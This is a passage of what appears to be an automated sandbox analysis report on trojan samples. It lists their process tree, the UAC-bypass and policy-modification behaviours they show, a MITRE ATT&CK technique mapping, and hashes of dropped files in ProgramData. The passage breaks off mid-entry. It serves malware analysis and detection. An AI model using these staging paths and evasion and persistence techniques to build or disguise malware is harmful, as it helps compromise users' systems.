                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                        • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                        PID:456
                                                                                                                                                                                                                                                                                                                                                    • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3216
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Whiter.a.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Whiter.a.exe"
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • UAC bypass
                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                        • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                        • System policy modification
                                                                                                                                                                                                                                                                                                                                                        PID:3624
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\S58D31P3G81W2AM3T08.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\S58D31P3G81W2AM3T08.exe"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                          • System policy modification
                                                                                                                                                                                                                                                                                                                                                          PID:5676
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\C72J32J4X77G8HW1U45.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\C72J32J4X77G8HW1U45.exe"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                                                                                                                                                                                          • System policy modification
                                                                                                                                                                                                                                                                                                                                                          PID:2468
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\H14Z05S0S16L8UI3Y10.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\H14Z05S0S16L8UI3Y10.exe"
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                            • UAC bypass
                                                                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                            • System policy modification
                                                                                                                                                                                                                                                                                                                                                            PID:2108
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\U15F72S4W53G8YH0G24.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\U15F72S4W53G8YH0G24.exe"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                          • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                          • System policy modification
                                                                                                                                                                                                                                                                                                                                                          PID:5084
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\Q51K53L0S14Y1SU4O58.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\Q51K53L0S14Y1SU4O58.exe"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • System policy modification
                                                                                                                                                                                                                                                                                                                                                          PID:5752
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WScript.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Offiz.js"
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4776
                                                                                                                                                                                                                                                                                                                                                        • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2112
                                                                                                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5236
                                                                                                                                                                                                                                                                                                                                                            • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4984
                                                                                                                                                                                                                                                                                                                                                              • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5732
                                                                                                                                                                                                                                                                                                                                                                • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:652
                                                                                                                                                                                                                                                                                                                                                                  • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:6000
                                                                                                                                                                                                                                                                                                                                                                    • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:920
                                                                                                                                                                                                                                                                                                                                                                      • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1788
                                                                                                                                                                                                                                                                                                                                                                        • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5984
                                                                                                                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1584
                                                                                                                                                                                                                                                                                                                                                                            • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1712
                                                                                                                                                                                                                                                                                                                                                                              • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1216
                                                                                                                                                                                                                                                                                                                                                                                • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4808
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4916
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4532
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5588
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4284
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:4464
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3800
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:668
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3120
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5744
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4188
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5524

                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                        Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                                        Resource Development

                                                                                                                                                                                                                                                                                                                                                                                                        Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                        T1059

                                                                                                                                                                                                                                                                                                                                                                                                        JavaScript

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1059.007

                                                                                                                                                                                                                                                                                                                                                                                                        PowerShell

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1059.001

                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                        System Services

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1569

                                                                                                                                                                                                                                                                                                                                                                                                        Service Execution

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1569.002

                                                                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                                                                        Account Manipulation

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1098

                                                                                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1547.004

                                                                                                                                                                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                                                                                                                                                                        Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1546

                                                                                                                                                                                                                                                                                                                                                                                                        Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1546.007

                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                        Server Software Component

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1505

                                                                                                                                                                                                                                                                                                                                                                                                        Terminal Services DLL

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1505.005

                                                                                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1548

                                                                                                                                                                                                                                                                                                                                                                                                        Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1548.002

                                                                                                                                                                                                                                                                                                                                                                                                        Account Manipulation

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1098

                                                                                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1547.004

                                                                                                                                                                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                                                                                                                                                                        Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1546

                                                                                                                                                                                                                                                                                                                                                                                                        Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1546.007

                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1548

                                                                                                                                                                                                                                                                                                                                                                                                        Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1548.002

                                                                                                                                                                                                                                                                                                                                                                                                        File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1222

                                                                                                                                                                                                                                                                                                                                                                                                        Hide Artifacts

                                                                                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                                                                                        T1564

                                                                                                                                                                                                                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                        T1564.001

                                                                                                                                                                                                                                                                                                                                                                                                        Hidden Users

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1564.002

                                                                                                                                                                                                                                                                                                                                                                                                        Impair Defenses

                                                                                                                                                                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                                                                                                                                                                        T1562

                                                                                                                                                                                                                                                                                                                                                                                                        Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1562.004

                                                                                                                                                                                                                                                                                                                                                                                                        Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                        T1562.001

                                                                                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                                                                                        Browser Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1217

                                                                                                                                                                                                                                                                                                                                                                                                        Password Policy Discovery

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1201

                                                                                                                                                                                                                                                                                                                                                                                                        Permission Groups Discovery

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1069

                                                                                                                                                                                                                                                                                                                                                                                                        Local Groups

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1069.001

                                                                                                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                                                                                        System Location Discovery

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1614

                                                                                                                                                                                                                                                                                                                                                                                                        System Language Discovery

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1614.001

                                                                                                                                                                                                                                                                                                                                                                                                        Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                        Remote Service Session Hijacking

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1563

                                                                                                                                                                                                                                                                                                                                                                                                        RDP Hijacking

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1563.002

                                                                                                                                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                                                                                                        Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                                                                                                                                                                                                        Service Stop

                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                        T1489

                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          c5ec8996fc800325262f5d066f5d61c9

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          95f8e486960d1ddbec88be92ef71cb03a3643291

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          244KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          4b2dbc48d42245ef50b975a7831e071c

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          3aab9b62004f14171d1f018cf74d2a804d74ef80

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\winlogon.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          35KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          2f6a1bffbff81e7c69d8aa7392175a72

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          94ac919d2a20aa16156b66ed1c266941696077da

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          381KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          ec0f9398d8017767f86a4d0e74225506

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Windows\install.vbs
                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          140B

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          5e36713ab310d29f2bdd1c93f2f0cad2

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          7e768cca6bce132e4e9132e8a00a1786e6351178

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Windows\reg1.reg
                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          12KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          806734f8bff06b21e470515e314cfa0d

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          d4ef2552f6e04620f7f3d05f156c64888c9c97ee

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Windows\reg2.reg
                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

